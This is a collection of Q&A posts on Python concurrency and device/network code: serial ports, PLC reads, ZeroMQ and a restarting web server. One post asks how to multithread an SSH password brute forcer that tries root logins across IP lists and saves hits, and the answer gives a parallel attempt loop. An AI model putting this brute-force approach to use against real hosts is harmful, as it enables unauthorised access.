Python threading: more than one argument given - python

I am trying to start threads, and I keep getting an error message saying that I am passing more than one argument. It seems like the Thread object does not take the variable port as one argument, but rather treats each character of the string as a separate argument. How does this work? It is my first time multithreading in Python.
Error message:
Exception in thread /dev/ttyUSB0:
Traceback (most recent call last):
File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner
self.run()
File "/usr/lib/python2.7/threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
TypeError: report() takes exactly 1 argument (12 given)
Code:
def report(port):
    print("\n")
    print(st() + "Connecting to" + port[0])
    device = serial.Serial(port=port[0], baudrate=9600, timeout=0.2)
    print(st() + "Connection sucessfull...")
    print(st() + "Initializing router on " + port[0])
    if initialize_router(device) == 0:
        return 0
    print(st() + "Initialization sucessfull")
    print(st() + "Starting to inject IP basic config")
    if inject_config(device) == 0:
        print(errror("injecing the confing", port[0]))
        return 0
    print(st() + "Finished injecting default IP setting on router connected to " + port[0])
    return 1
if __name__ == '__main__':
    ports = list_ports.comports()
    list_port = list(ports)
    port_counter = -1
    for port in list_port:
        if "USB" in port[0]:
            port_counter = port_counter + 1
            port = "/dev/ttyUSB" + str(port_counter)
            thread = Thread(target=report, args=(port), name=port)
            thread.start()
            print port
            print ("\n")
            continue

thread = Thread(target=report, args=(port), name=port)
I'm guessing you wanted to pass a single element tuple to args here. But those parentheses around port have no effect by themselves. Try:
thread = Thread(target=report, args=(port,), name=port)
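The difference is easy to verify in isolation; this minimal sketch uses the same device string as above:

```python
from threading import Thread

# ("/dev/ttyUSB0") is just a parenthesized string, so Thread unpacks it
# into 12 one-character arguments; ("/dev/ttyUSB0",) is a one-element tuple.
assert ("/dev/ttyUSB0") == "/dev/ttyUSB0"   # parentheses alone: still a str
assert len(("/dev/ttyUSB0",)) == 1          # trailing comma: a 1-tuple

results = []
t = Thread(target=results.append, args=("/dev/ttyUSB0",))
t.start()
t.join()
print(results)  # ['/dev/ttyUSB0']
```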

Related

Python pySerial - Problem using subclasses

I'm working on a project in Python that uses two or more serial ports to manage some devices from my RPi. When ports are open in the same file and I send commands to different instances of serial.Serial object everything works fine. This is an example:
import serial
device1_port = "/dev/ttyUSB0"
device2_port = "/dev/ttyUSB1"
# Command sent to device 1. No problem
d1 = serial.Serial(device1_port, timeout = 0.5)
d1.write(b'GET MUTE\n')
output1 = d1.readline()
print("Device 1 output: " + str(output1))
# Command sent to device 2. No problem
d2 = serial.Serial(device2_port, timeout = 1)
d2.write(b'00vP\r')
output2 = d2.readline()
print("Device 2 output: " + str(output2))
Output:
Device 1 output: b'DATA MUTE OFF\r\n'
Device 2 output: b'00vP0\r'
The problem comes when I try to separate one device from another using subclasses of serial.Serial. The reason is that I want to treat them as objects with their own methods (each device needs a lot of different commands, status queries and so on).
class device1(serial.Serial):
    def __init__(self, port, timeout):
        super().__init__(port, timeout)
        serial.Serial(port, timeout)
    def command1(self):
        self.write(b'SET MUTE OFF\n')
        self.write(b'GET MUTE\n')
        output = self.readline()
        print("Device 1 output: " + str(output))

class device2(serial.Serial):
    def __init__(self, port, timeout):
        super().__init__(port, timeout)
        serial.Serial(port, timeout)
    def command2(self):
        self.write(b'00vP\r')
        output = self.readline()
        print("Device 2 output: " + str(output))

device1_port = "/dev/ttyUSB0"
device2_port = "/dev/ttyUSB1"
d1 = device1(device1_port, timeout=0.5)
d2 = device2(device2_port, timeout=1)
d1.command1()
d2.command2()
When I run this code the output is:
Device 1 output: b'DATA MUTE OFF\r\n'
_
and it keeps waiting forever for the second device. I'm forced to Ctrl + C and I get this:
^CTraceback (most recent call last):
File "./ct3.py", line 35, in <module>
d2.command2()
File "./ct3.py", line 23, in command2
output = self.readline()
File "/usr/lib/python3/dist-packages/serial/serialposix.py", line 483, in read
ready, _, _ = select.select([self.fd, self.pipe_abort_read_r], [], [], timeout.time_left())
KeyboardInterrupt
It seems like there is some kind of conflict between the two subclasses, but obviously I have no idea what I'm doing wrong.
Can someone help me, please?
You shouldn't be calling serial.Serial(port, timeout) from your __init__,
as super().__init__(...) is already doing this. See these answers. You don't even need an __init__ if you are not going to change what the base class does.
Also, there is a difference between your two versions in how positional and keyword arguments are used. serial.Serial()'s first two positional parameters are port and baudrate, so you need to pass timeout explicitly as a keyword argument:
def __init__(self, port, timeout):
    super().__init__(port, timeout=timeout)
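The keyword-argument point can be checked without any hardware. In this sketch, Base is a stand-in for serial.Serial (whose first positional parameters are port and baudrate); it is not the real pyserial class:

```python
# Base mimics serial.Serial's parameter order (port, baudrate, timeout, ...);
# it is a stand-in for illustration, not the real pyserial class.
class Base:
    def __init__(self, port, baudrate=9600, timeout=None):
        self.port, self.baudrate, self.timeout = port, baudrate, timeout

class Device1(Base):
    def __init__(self, port, timeout):
        # timeout must be passed by keyword, or it lands in the baudrate slot
        super().__init__(port, timeout=timeout)

d = Device1("/dev/ttyUSB0", timeout=0.5)
print(d.baudrate, d.timeout)  # 9600 0.5
```

Passing super().__init__(port, timeout) positionally would instead set baudrate to 0.5, which is the kind of silent misconfiguration that makes readline() block forever.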

Job Pending Exception During Snap7-Python Data Read / Write to PLC

While reading and writing data to a Siemens S7-1200 PLC with Python-Snap7, I get an exception as follows:
Exception in thread Thread-2:
Traceback (most recent call last):
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\Lib\threading.py", line 917, in _bootstrap_inner
self.run()
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\Lib\threading.py", line 865, in run
self._target(*self._args, **self._kwargs)
File "C:\Companies\Personal\deneme\deneme_iterasyonlar\plcman.py", line 59, in read_data
torque=plc.read_area(areas['DB'],110,80,24)
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\lib\site-packages\snap7\client.py", line 256, in read_area
check_error(result, context="client")
File "C:\Users\MDoganli\AppData\Local\Programs\Python\Python37-32\lib\site-packages\snap7\common.py", line 65, in check_error
raise Snap7Exception(error)
snap7.snap7exceptions.Snap7Exception: b'CLI : Job pending'
I don't experience this problem with a single-channel db_read/db_write, but it occurs when an additional read or write channel is active.
I have tried area_read & area_write and db_read and db_write options but receive similar errors.
Main Code:
plc=plcman.PLC_Controller('192.168.30.100',0,1)
plc.connect()
time.sleep(1)
plc.start_thread2()
time.sleep(1)
plc.start_thread()
PLC Data-Read Write Code
class PLC_Controller:
    plc = c.Client()
    def __init__(self, address, rack, slot):
        self.address = address
        self.rack = rack
        self.slot = slot
    def connect(self):
        count = 0
        if plc.get_connected() == False:
            print("Try " + str(count) + " - Connecting to PLC: " +
                  self.address + ", Rack: " + str(self.rack) + ", Slot: " + str(self.slot))
            try:
                plc.connect(self.address, self.rack, self.slot)  # ('IP-address', rack, slot)
            except Exception as e:
                print(e)
        if plc.get_connected() == True:
            return plc.get_connected() == True
    def get_word(self, _bytearray, byte_index):
        data = _bytearray[byte_index:byte_index + 2]
        data = data[::-1]
        dword = struct.unpack('H', struct.pack('2B', *data))[0]
        return dword
    def read_data(self):
        torque = plc.read_area(areas['DB'], 110, 80, 24)
        data1 = self.get_word(torque, 0)
        time.sleep(0.8)
        self.read_data()
    def start_thread(self):
        thread = threading.Thread(target=self.read_data, args=())
        thread.daemon = True
        thread.start()
    def set_word(self, _bytearray, byte_index, word):
        word = int(word)
        _bytes = struct.pack('H', word)
        _bytes = _bytes[::-1]
        for i, b in enumerate(_bytes):
            time.sleep(1)
            _bytearray[byte_index + i] = b
        res = plc.write_area(areas['DB'], 110, 24, _bytearray)
    def start_thread2(self):
        thread = threading.Thread(target=self.stoprun, args=())
        thread.daemon = True
        thread.start()
    def stoprun(self):
        Lamp = 4
        torque = plc.read_area(areas['DB'], 110, 80, 24)
        val1 = self.set_word(torque, 0, 8)
        self.stoprun()
Thanks in advance.
Reading and writing should use different instances of the PLC connection. The modified connection code becomes:
plc = plcman.PLC_Controller('192.168.30.100', 0, 1)   # for reading, use plc.read_area()
plc.connect()
plc2 = plcman.PLC_Controller('192.168.30.100', 0, 1)
plc2.connect()                                        # for writing, use plc2.write_area()
Up to three instances are allowed. With separate clients for reading and writing, the "Job pending" error will no longer occur.
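The one-connection-per-thread pattern this suggests can be sketched without hardware. DummyClient below is an illustrative stand-in for snap7.client.Client, with simplified method signatures that are not the real snap7 API:

```python
import threading

class DummyClient:
    # stand-in for snap7.client.Client; simplified signatures for illustration
    def __init__(self):
        self.jobs = []
    def read_area(self, db, start, size):
        self.jobs.append(("read", db, start, size))
    def write_area(self, db, start, data):
        self.jobs.append(("write", db, start, data))

# one client per thread: the reader and writer never share a connection,
# so neither can see the other's "job pending" state
reader, writer = DummyClient(), DummyClient()

t1 = threading.Thread(target=reader.read_area, args=(110, 80, 24))
t2 = threading.Thread(target=writer.write_area, args=(110, 24, b"\x00"))
t1.start(); t2.start()
t1.join(); t2.join()
print(len(reader.jobs), len(writer.jobs))  # 1 1
```

The same separation would apply to the PLC_Controller class above: each instance should own its own Client rather than sharing one class-level plc attribute.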

Python pyzmq: program gets stuck

It is a simple PUB/SUB program using pyzmq and multiprocessing.
The server is the PUB side. Each time, it sends one slice of the ahah list to the SUB client.
The client first receives one message with a blocking .recv_string(), then switches to non-blocking (zmq.NOBLOCK) receives inside a .Poller() loop.
import logging
import zmq
from multiprocessing import Process

def server_init(port_pub):
    ahah = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    index = 0
    num = 2
    context = zmq.Context()
    socket_pub = context.socket(zmq.PUB)
    socket_pub.bind("tcp://127.0.0.1:%s" % port_pub)
    # socket_rep = context.socket(zmq.REP)
    # socket_rep.bind("tcp://*:%s" % port_rep)
    socket_pub.send_string(' '.join(str(v) for v in ahah[index : index + num - 1]))
    index = index + num
    poller_pub = zmq.Poller()
    poller_pub.register(socket_pub, zmq.POLLOUT)
    should_continue = True
    while should_continue:
        socks = dict(poller_pub.poll())
        if socket_pub in socks and socks[socket_pub] == zmq.POLLOUT and index <= 9:
            socket_pub.send_string(' '.join(str(v) for v in ahah[index : index + num - 1]), zmq.NOBLOCK)
            index = index + num
        else:
            should_continue = False
            poller_pub.unregister(socket_pub)

def client(port_sub):
    context = zmq.Context()
    socket_sub = context.socket(zmq.SUB)
    socket_sub.connect("tcp://127.0.0.1:%s" % port_sub)
    tmp = socket_sub.recv_string()
    process_message(tmp)
    poller_sub = zmq.Poller()
    poller_sub.register(socket_sub, zmq.POLLIN)
    should_continue = True
    while should_continue:
        socks = dict(poller_sub.poll())
        if socket_sub in socks and socks[socket_sub] == zmq.POLLIN:
            tmp = socket_sub.recv_string(zmq.NOBLOCK)
            process_message(tmp)
        else:
            should_continue = False
            poller_pub.unregister(socket_sub)

def process_message(msg):
    print("Processing ... %s" % msg)

if __name__ == '__main__':
    logging.info('starting')
    Process(target=server_init, args=(5566,)).start()
    Process(target=client, args=(5566,)).start()
When I launch the program, it just gets stuck and outputs nothing:
$ python test.py
Until after a Ctrl-C is pressed:
$ python test2.py
^CProcess Process-2:
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/popen_fork.py", line 29, in poll
pid, sts = os.waitpid(self.pid, flag)
KeyboardInterrupt
Traceback (most recent call last):
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/process.py", line 254, in _bootstrap
self.run()
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/multiprocessing/process.py", line 93, in run
self._target(*self._args, **self._kwargs)
File "test2.py", line 38, in client
tmp = socket_sub.recv_string()
File "/Users/jack/.pyenv/versions/3.5.1/lib/python3.5/site-packages/zmq/sugar/socket.py", line 402, in recv_string
b = self.recv(flags=flags)
File "zmq/backend/cython/socket.pyx", line 674, in zmq.backend.cython.socket.Socket.recv (zmq/backend/cython/socket.c:6971)
File "zmq/backend/cython/socket.pyx", line 708, in zmq.backend.cython.socket.Socket.recv (zmq/backend/cython/socket.c:6763)
File "zmq/backend/cython/socket.pyx", line 145, in zmq.backend.cython.socket._recv_copy (zmq/backend/cython/socket.c:1931)
File "zmq/backend/cython/checkrc.pxd", line 12, in zmq.backend.cython.checkrc._check_rc (zmq/backend/cython/socket.c:7222)
KeyboardInterrupt
I think the client should at least .recv() one message. But it doesn't - why not?
Why?
Besides other possible reasons, your client side has simply forgotten to subscribe to anything before calling the first .recv_string(), so it hangs forever in a blocking receive: nothing can pass the SUB-side topic filter, and no message will ever reach the .recv_string() processing.
Just add socket_sub.setsockopt(zmq.SUBSCRIBE, b"") after the connect. The ZeroMQ default is to subscribe to nothing (no one can guess what should pass the topic filter in your particular context, so, paradoxically, nothing is the safest default).
Next, also be careful about the timing sensitivity of .bind() / .connect() (the "slow joiner" problem).
For more details, do not hesitate to download and read Pieter HINTJENS' fabulous book "Code Connected, Volume 1".
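The missing-subscription fix can be demonstrated in a few lines. This sketch uses the inproc transport so it runs in a single process; the endpoint name demo is arbitrary:

```python
import time
import zmq

ctx = zmq.Context.instance()
pub = ctx.socket(zmq.PUB)
pub.bind("inproc://demo")

sub = ctx.socket(zmq.SUB)
sub.connect("inproc://demo")
sub.setsockopt(zmq.SUBSCRIBE, b"")  # without this, the SUB filters out everything

time.sleep(0.2)                     # give the slow-joiner handshake time
pub.send_string("1 2")
print(sub.recv_string())
```

Remove the setsockopt line and recv_string() blocks forever, which is exactly the hang shown in the traceback above.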

Multithreading my simple SSH Brute forcer

I've coded a simple SSH bruteforcer, and I am trying to make it multi-threaded, as it runs very slowly at the moment. As you can see in the last few lines, I have given it an attempt, but I don't fully understand threading. I have read a few examples, but I felt that adding it to my own program would help me understand it better.
Code:
try:
    import paramiko
except ImportError:
    print("Paramiko module not installed, exiting.")
from multiprocessing.dummy import Pool, Process, JoinableQueue as Queue
import os
from datetime import datetime

startTime = datetime.now()
UserName2 = 'root'
pass_file = 'pass.txt'
ip_file = 'ip.txt'
port = 22
Found = 0
IPLines = 0
PasswordLines = 0
with open('pass.txt') as txt1:
    for line in txt1:
        if line.strip():
            PasswordLines += 1
with open('ip.txt') as txt2:
    for line2 in txt2:
        if line2.strip():
            IPLines += 1
current_attempts = 0
max_attempts = PasswordLines * IPLines

def print_results(found):
    while True:
        ip, password = found.get()
        print("Found: %r %r" % (ip, password))
        found.task_done()

def init(found_):
    global found
    found = found_

def generate_passwords():
    #return (line.strip() for line in open(pass_file))
    global ip
    global pwd
    global txt4
    txt3 = open(pass_file, "r")
    txt4 = open(ip_file, "r")
    for line3 in txt3.readlines():
        pwd = line3.strip()
    for line4 in txt4.readlines():
        ip = line4.strip()

def check(ip_password):
    global current_attempts
    ip, password = ip_password
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip, port, username=UserName2, password=pwd)
    except paramiko.AuthenticationException, e:
        print e
        print '[-] %s:%s fail!' % (UserName2, pwd)
        current_attempts += 1
    except Exception, e:
        print e
    else:
        print '[!] %s:%s is CORRECT for IP %s!' % (UserName2, pwd, ip)
        username, password, ipaddress = UserName2, pwd, ip
        found.put((username, password, ipaddress))
        seconds_taken = datetime.now() - startTime
        print 'brute forcing took %s seconds' % seconds_taken
        ssh.close()
        print 'Found login in %s attempts' % current_attempts
        if os.path.isfile("correct.txt"):
            c = open("correct.txt", "a")
            c.write('\n' + ip + ':' + UserName2 + ':' + pwd)
        elif os.path.isfile("correct.txt"):
            c = open('correct.txt', "w")
            c.write(ip + ':' + UserName2 + ':' + pwd)

def main():
    found = Queue()
    t = Process(target=check, args=[found])
    t.daemon = True  # do not survive the parent
    t.start()
    pool = Pool(processes=20, initializer=init, initargs=[found])
    args = ((ip, password) for password in generate_passwords() for ip in txt4)
    for _ in pool.imap_unordered(check, args):
        pass
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete
    found.join()  # wait until all results are printed

if __name__ == "__main__":
    main()
Errors:
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 65, in check
ip, password = ip_password
TypeError: iteration over non-sequence
Traceback (most recent call last):
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 107, in <module>
main()
File "C:\Python33\Stuff I made\SSH_Bruter4.py", line 99, in main
args = ((ip, password) for password in generate_passwords() for ip in txt4)
TypeError: 'NoneType' object is not iterable
The problem is embarrassingly parallel. You can run the ssh connection attempts concurrently, both for different ips and for different passwords:
#!/usr/bin/env python
# remove .dummy to use processes instead of threads
from multiprocessing.dummy import Pool

def check(params):
    ip, username, password = params
    # emulate ssh login attempt #XXX put your ssh connect code here
    import random
    successful = random.random() < .0001
    return successful, params

def main():
    creds = {}
    ips = ["168.1.2.%d" % i for i in range(256)]  #XXX dummy ip list, use yours
    usernames = ["nobody", "root"]  #XXX dummy user list, use yours
    def generate_args():
        for ip in ips:
            for username in usernames:
                for password in generate_passwords():
                    if (ip, username) in creds:
                        break
                    yield ip, username, password
    pool = Pool(processes=20)
    for success, params in pool.imap_unordered(check, generate_args()):
        if not success:
            continue
        print("Found: %r" % (params,))
        ip, username, password = params
        creds[ip, username] = password
    pool.close()  # no more tasks
    pool.join()   # wait for all tasks in the pool to complete

if __name__=="__main__":
    main()
where ips is a list of all the ips you want to try and generate_passwords() is a generator that yields one password at a time; here's an example:
def generate_passwords(pass_file):
    return (line.strip() for line in open(pass_file))
About errors
ValueError: too many values to unpack
your code has found.put((username, password, ipaddress)) (a tuple of 3 values), but the print_results() function expects ip, password = found.get() (2 values). The error "too many values to unpack" arises because 3 is more than 2.
'NoneType' object is not iterable
your generate_passwords() function returns nothing (None), but it is used where a generator of passwords is expected (see the example implementation above).

Python 3.3 Webserver restarting problems

I have made a simple webserver in Python and had some problems with it before, as described here: Python (3.3) Webserver script with an interesting error
In that question, the answer was to use a while True: loop so that any crash or error would be resolved instantly, because the server would just start itself again.
I've used this for a while, and I still want the server to restart itself every few minutes, but on Linux, for some reason, it won't work for me. On Windows the code below works fine, but on Linux it keeps failing with the error shown further down.
Handler class up here
...
...
class Server:
    def __init__(self):
        self.server_class = HTTPServer
        self.server_adress = ('MY IP GOES HERE, or localhost', 8080)
        global httpd
        httpd = self.server_class(self.server_adress, Handler)
        self.main()
    def main(self):
        if count > 1:
            global SERVER_UP_SINCE
            HOUR_CHECK = int(((count - 1) * RESTART_INTERVAL) / 60)
            SERVER_UPTIME = str(HOUR_CHECK) + " MINUTES"
            if HOUR_CHECK > 60:
                minutes = int(HOUR_CHECK % 60)
                hours = int(HOUR_CHECK // 60)
                SERVER_UPTIME = ("%s HOURS, %s MINUTES" % (str(hours), str(minutes)))
            SERVING_ON_ADDR = self.server_adress
            SERVER_UP_SINCE = str(SERVER_UP_SINCE)
            SERVER_RESTART_NUMBER = count - 1
            print("""
SERVER INFO
-------------------------------------
SERVER_UPTIME: %s
SERVER_UP_SINCE: %s
TOTAL_FILES_SERVED: %d
SERVING_ON_ADDR: %s
SERVER_RESTART_NUMBER: %s
\n\nSERVER HAS RESTARTED
""" % (SERVER_UPTIME, SERVER_UP_SINCE, TOTAL_FILES, SERVING_ON_ADDR, SERVER_RESTART_NUMBER))
        else:
            print("SERVER_BOOT=1\nSERVER_ONLINE=TRUE\nRESTART_LOOP=TRUE\nSERVING_ON_ADDR:%s" % str(self.server_adress))
        while True:
            try:
                httpd.serve_forever()
            except KeyboardInterrupt:
                print("Shutting down...")
                break
        httpd.shutdown()
        httpd.socket.close()
        raise(SystemExit)
        return

def server_restart():
    """If you want the restart timer to be longer, replace the number after the RESTART_INTERVAL variable"""
    global RESTART_INTERVAL
    RESTART_INTERVAL = 10
    threading.Timer(RESTART_INTERVAL, server_restart).start()
    global count
    count = count + 1
    instance = Server()

if __name__ == "__main__":
    global SERVER_UP_SINCE
    SERVER_UP_SINCE = strftime("%d-%m-%Y %H:%M:%S", gmtime())
    server_restart()
Basically, I make a thread that restarts the server every 10 seconds (for testing purposes) and start the server. After ten seconds it says:
File "/home/username/Desktop/Webserver/server.py", line 199, in __init__
httpd = self.server_class(self.server_adress, Handler)
File "/usr/lib/python3.3/socketserver.py", line 430, in __init__
self.server_bind()
File "/usr/lib/python3.3/http/server.py", line 135, in server_bind
socketserver.TCPServer.server_bind(self)
File "/usr/lib/python3.3/socketserver.py", line 441, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
As you can see around the except KeyboardInterrupt line, I tried everything to make the server and the program stop, but it will NOT stop. But the thing I really want to know is how to make this server able to restart without throwing these errors.
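The traceback points at the likely cause: server_restart() constructs a new Server() every interval while the previous httpd still holds port 8080, so the second bind fails with Errno 98. A minimal sketch of the close-before-rebind pattern (it uses port 0 to grab a free port and stay self-contained, whereas the script above hardcodes 8080):

```python
from http.server import HTTPServer, BaseHTTPRequestHandler

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()

# port 0 lets the OS pick any free port, so this sketch runs anywhere
httpd = HTTPServer(("127.0.0.1", 0), Handler)
port = httpd.server_address[1]
httpd.server_close()                              # release the socket first
httpd = HTTPServer(("127.0.0.1", port), Handler)  # rebinding now succeeds
httpd.server_close()
print("rebind ok")
```

In the restart timer, the equivalent fix is to call httpd.shutdown() and httpd.server_close() on the old instance before constructing the next Server(), rather than stacking live servers on the same port.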
